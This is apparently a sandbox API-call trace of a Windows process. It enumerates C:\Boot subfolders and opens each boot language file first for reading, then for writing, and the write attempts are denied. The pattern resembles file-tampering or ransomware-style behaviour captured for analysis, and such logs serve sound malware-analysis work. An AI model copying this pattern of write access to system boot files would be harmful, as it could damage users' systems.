| out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0084.002] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0084.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0084.002] FindFirstFileExW (in: lpFileName="C:\\Boot\\qps-ploc\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78750 [0084.003] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.003] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0084.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0084.003] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.003] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.003] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.003] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0084.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.004] AreFileApisANSI () returned 1 [0084.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 33 [0084.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0084.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0084.004] AreFileApisANSI () returned 1 [0084.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0084.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x690d0 [0084.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 33 [0084.004] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0084.004] GetFileType (hFile=0x340) returned 0x1 [0084.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0084.004] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.005] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.005] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.005] CloseHandle (hObject=0x340) returned 1 [0084.005] AreFileApisANSI () returned 1 [0084.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0084.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69300 [0084.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 33 [0084.005] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.005] GetLastError () returned 0x5 [0084.005] GetLastError () returned 0x5 [0084.005] SetLastError (dwErrCode=0x5) [0084.005] GetLastError () returned 0x5 [0084.005] SetLastError (dwErrCode=0x5) [0084.005] GetLastError () returned 0x5 [0084.005] SetLastError (dwErrCode=0x5) [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0084.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.006] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0084.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0084.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0084.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.007] AreFileApisANSI () returned 1 [0084.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\qps-ploc\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\qps-ploc\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 33 [0084.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0084.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.007] AreFileApisANSI () returned 1 [0084.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0084.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68d60 [0084.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\memtest.exe.mui") returned 33 [0084.007] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0084.007] GetFileType (hFile=0x340) returned 0x1 [0084.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0084.008] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.008] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.008] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.008] CloseHandle (hObject=0x340) returned 1 [0084.008] AreFileApisANSI () returned 1 [0084.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0084.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68f40 [0084.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\memtest.exe.mui") returned 33 [0084.008] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.008] GetLastError () returned 0x5 [0084.008] GetLastError () returned 0x5 [0084.008] SetLastError (dwErrCode=0x5) [0084.008] GetLastError () returned 0x5 [0084.008] SetLastError (dwErrCode=0x5) [0084.009] GetLastError () returned 0x5 [0084.009] SetLastError (dwErrCode=0x5) [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0084.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.009] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x40, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6d740, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x40, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧페")) returned 0 [0084.009] FindClose (in: hFindFile=0x78750 | out: hFindFile=0x78750) returned 1 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0084.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0084.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0084.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0084.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.010] AreFileApisANSI () returned 1 [0084.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources", lpUsedDefaultChar=0x0) returned 18 [0084.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 